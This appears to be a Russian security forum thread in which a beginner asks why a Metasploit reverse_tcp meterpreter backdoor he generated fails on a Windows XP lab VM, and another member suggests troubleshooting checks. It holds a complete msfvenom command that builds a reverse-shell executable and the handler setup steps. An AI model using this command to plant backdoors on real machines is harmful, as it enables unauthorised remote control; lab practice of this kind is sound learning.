• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Зависает msfexploit при использовании payload windows/meterpreter/reverse_tcp

16.04.2020
12
0
BIT
0
Коллеги, помогите новичку.

Осваиваю метаэксплоит самостоятельно, поэтому не кидайте камнями. Хочу проэксплуатировать уязвимость используя сгенерированный бэкдор reverse_tcp

Есть 2 виртуальные машины:
1. Kali linux 192.168.18.129
2. Windows XP 2002 Service Pack 3 192.168.18.131

Итак хочу протестировать сгенерированный бэкдор с помощью команды

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.129 lport=4444 -f exe -o backdoor.exe (скрин)

Полученный бэкдор копирую на машину Windows XP. Запускаю (в процессах я его не вижу, может так и должно быть - незнаю). Но в окне командной строки которая появляется при выполнении, написано "This Program can't be run in DOS mode"

У себя на сервере kali запускаю msfconsole

затем use exploit/multi/handler. Устанавливаю параметры lhost и lport такие же как и при создании бэкдора. И запускаю.. И тишина. Ничего не происходит. Если проверить nmap - то порт у меня 4444 открыт. Может сам бэкдор не работает?

Пробовал его запустить на другой виртуалке с Windows 7 - но он не выполняется пишет что несовместима разрядность.

Подскажите, что я делаю не так?
 

Вложения

  • WinXpBackdoor.jpg
    WinXpBackdoor.jpg
    119,6 КБ · Просмотры: 195
  • создание бэкдора.jpg
    создание бэкдора.jpg
    31,6 КБ · Просмотры: 208
  • тупик.jpg
    тупик.jpg
    41,5 КБ · Просмотры: 418

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
Визуально всё правильно, кроме ошибки при запуске пейлоад. WinXP под руками нет, но на W10 x64 работает. С LHOST/LPORT тоже всё ок.
Что говорит file backdoor.exe на Kali? Антивирус и файрвол выключены?
 
16.04.2020
12
0
BIT
0
Визуально всё правильно, кроме ошибки при запуске пейлоад. WinXP под руками нет, но на W10 x64 работает. С LHOST/LPORT тоже всё ок.
Что говорит file backdoor.exe на Kali? Антивирус и файрвол выключены?
Говорит что исполняемый файл. Антивируса вообще нет никакого, брандмауэр тоже выключен.
 

Вложения

  • file backdoor.jpg
    file backdoor.jpg
    57,6 КБ · Просмотры: 165

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
Говорит что исполняемый файл. Антивируса вообще нет никакого, брандмауэр тоже выключен.
Ошибка говорит о том, что либо файл битый, либо metasploit что-то поменяли в плане совместимости с ОС (не должны :) ).
 
16.04.2020
12
0
BIT
0
Ну файл битый вроде быть не должен :( несколько раз генерил заново.
А второе предположение тоже маловероятное. Вопрос остаётся открытым
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!